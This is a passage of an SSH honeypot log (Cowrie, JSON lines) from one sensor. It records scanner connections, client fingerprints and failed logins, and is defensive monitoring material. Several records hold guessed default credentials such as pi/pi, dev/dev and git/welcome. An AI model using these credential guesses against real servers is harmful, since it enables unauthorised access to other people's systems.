mac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:19:30.272365Z","src_ip":"212.227.125.160","session":"a1fdfbfb97dc"}
{"eventid":"cowrie.login.failed","username":"git","password":"letmein","message":"login attempt [git/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:32.613939Z","src_ip":"212.227.125.160","session":"a1fdfbfb97dc"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:34.183913Z","src_ip":"212.227.125.160","session":"a1fdfbfb97dc"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41836,"dst_ip":"1.2.3.4","dst_port":22,"session":"c403112e10ad","protocol":"ssh","message":"New connection: 41.226.27.251:41836 (1.2.3.4:22) [session: c403112e10ad]","sensor":"my-vps","timestamp":"2025-08-31T03:19:35.380110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:19:35.395124Z","src_ip":"41.226.27.251","session":"c403112e10ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:19:35.426378Z","src_ip":"41.226.27.251","session":"c403112e10ad"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:35.605204Z","src_ip":"41.226.27.251","session":"c403112e10ad"}
{"eventid":"cowrie.session.closed","duration":"69.4","message":"Connection lost after 69.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:36.643679Z","src_ip":"212.227.125.160","session":"57ca1ad02829"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:36.934432Z","src_ip":"41.226.27.251","session":"c403112e10ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51644,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2a2fe48ef53","protocol":"ssh","message":"New connection: 212.227.125.160:51644 (1.2.3.4:22) [session: d2a2fe48ef53]","sensor":"my-vps","timestamp":"2025-08-31T03:19:46.025007Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:50.182249Z","src_ip":"212.227.125.160","session":"566bace3e636"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39164,"dst_ip":"1.2.3.4","dst_port":22,"session":"902d9d5c92f6","protocol":"ssh","message":"New connection: 41.226.27.251:39164 (1.2.3.4:22) [session: 902d9d5c92f6]","sensor":"my-vps","timestamp":"2025-08-31T03:19:55.394979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:19:55.398744Z","src_ip":"41.226.27.251","session":"902d9d5c92f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:19:55.439389Z","src_ip":"41.226.27.251","session":"902d9d5c92f6"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:55.614782Z","src_ip":"41.226.27.251","session":"902d9d5c92f6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:56.837588Z","src_ip":"41.226.27.251","session":"902d9d5c92f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:20:05.837011Z","src_ip":"212.227.125.160","session":"d2a2fe48ef53"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:20:05.838083Z","src_ip":"212.227.125.160","session":"d2a2fe48ef53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34130,"dst_ip":"1.2.3.4","dst_port":22,"session":"97c8961a9f7c","protocol":"ssh","message":"New connection: 212.227.235.229:34130 (1.2.3.4:22) [session: 97c8961a9f7c]","sensor":"my-vps","timestamp":"2025-08-31T03:20:07.105171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:20:07.847809Z","src_ip":"212.227.235.229","session":"97c8961a9f7c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:20:07.851277Z","src_ip":"212.227.235.229","session":"97c8961a9f7c"}
{"eventid":"cowrie.login.failed","username":"git","password":"welcome","message":"login attempt [git/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:20:13.447318Z","src_ip":"212.227.235.229","session":"97c8961a9f7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48392,"dst_ip":"1.2.3.4","dst_port":22,"session":"9972ad2062c6","protocol":"ssh","message":"New connection: 212.227.125.160:48392 (1.2.3.4:22) [session: 9972ad2062c6]","sensor":"my-vps","timestamp":"2025-08-31T03:20:14.010392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:20:14.011709Z","src_ip":"212.227.125.160","session":"9972ad2062c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:20:14.271507Z","src_ip":"212.227.125.160","session":"9972ad2062c6"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":58950,"dst_ip":"1.2.3.4","dst_port":22,"session":"af9c1e51c72d","protocol":"ssh","message":"New connection: 41.226.27.251:58950 (1.2.3.4:22) [session: af9c1e51c72d]","sensor":"my-vps","timestamp":"2025-08-31T03:20:15.293384Z"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:15.318334Z","src_ip":"212.227.235.229","session":"97c8961a9f7c"}
{"eventid":"cowrie.login.failed","username":"app","password":"pm0OIb","message":"login attempt [app/pm0OIb] failed","sensor":"my-vps","timestamp":"2025-08-31T03:20:15.344799Z","src_ip":"212.227.125.160","session":"9972ad2062c6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:20:15.398234Z","src_ip":"41.226.27.251","session":"af9c1e51c72d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:20:15.399116Z","src_ip":"41.226.27.251","session":"af9c1e51c72d"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-31T03:20:15.614309Z","src_ip":"41.226.27.251","session":"af9c1e51c72d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:16.605634Z","src_ip":"212.227.125.160","session":"9972ad2062c6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:16.925916Z","src_ip":"41.226.27.251","session":"af9c1e51c72d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56982,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7061a7309e8","protocol":"ssh","message":"New connection: 212.227.235.229:56982 (1.2.3.4:22) [session: a7061a7309e8]","sensor":"my-vps","timestamp":"2025-08-31T03:20:26.234341Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52478,"dst_ip":"1.2.3.4","dst_port":22,"session":"efb1e41e5ba3","protocol":"ssh","message":"New connection: 212.227.125.160:52478 (1.2.3.4:22) [session: efb1e41e5ba3]","sensor":"my-vps","timestamp":"2025-08-31T03:20:27.521042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:20:28.068037Z","src_ip":"212.227.125.160","session":"efb1e41e5ba3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:20:28.068737Z","src_ip":"212.227.125.160","session":"efb1e41e5ba3"}
{"eventid":"cowrie.login.failed","username":"git","password":"welcome","message":"login attempt [git/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:20:30.552696Z","src_ip":"212.227.125.160","session":"efb1e41e5ba3"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:32.024572Z","src_ip":"212.227.125.160","session":"efb1e41e5ba3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":53782,"dst_ip":"1.2.3.4","dst_port":22,"session":"72c4799308ca","protocol":"ssh","message":"New connection: 41.226.27.251:53782 (1.2.3.4:22) [session: 72c4799308ca]","sensor":"my-vps","timestamp":"2025-08-31T03:20:36.159848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:20:36.161005Z","src_ip":"41.226.27.251","session":"72c4799308ca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:20:36.206353Z","src_ip":"41.226.27.251","session":"72c4799308ca"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-31T03:20:36.340883Z","src_ip":"41.226.27.251","session":"72c4799308ca"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:37.550568Z","src_ip":"41.226.27.251","session":"72c4799308ca"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:20:39.588269Z","src_ip":"212.227.235.229","session":"a7061a7309e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:20:39.589036Z","src_ip":"212.227.235.229","session":"a7061a7309e8"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:20:46.823133Z","src_ip":"212.227.125.160","session":"d2a2fe48ef53"}
{"eventid":"cowrie.session.closed","duration":120.00180506706238,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:47.794086Z","src_ip":"212.227.125.160","session":"dcc97bee9e24"}
{"eventid":"cowrie.session.closed","duration":"68.7","message":"Connection lost after 68.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:54.694502Z","src_ip":"212.227.125.160","session":"d2a2fe48ef53"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50456,"dst_ip":"1.2.3.4","dst_port":22,"session":"003731a5bd74","protocol":"ssh","message":"New connection: 41.226.27.251:50456 (1.2.3.4:22) [session: 003731a5bd74]","sensor":"my-vps","timestamp":"2025-08-31T03:20:56.688451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:20:56.689500Z","src_ip":"41.226.27.251","session":"003731a5bd74"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.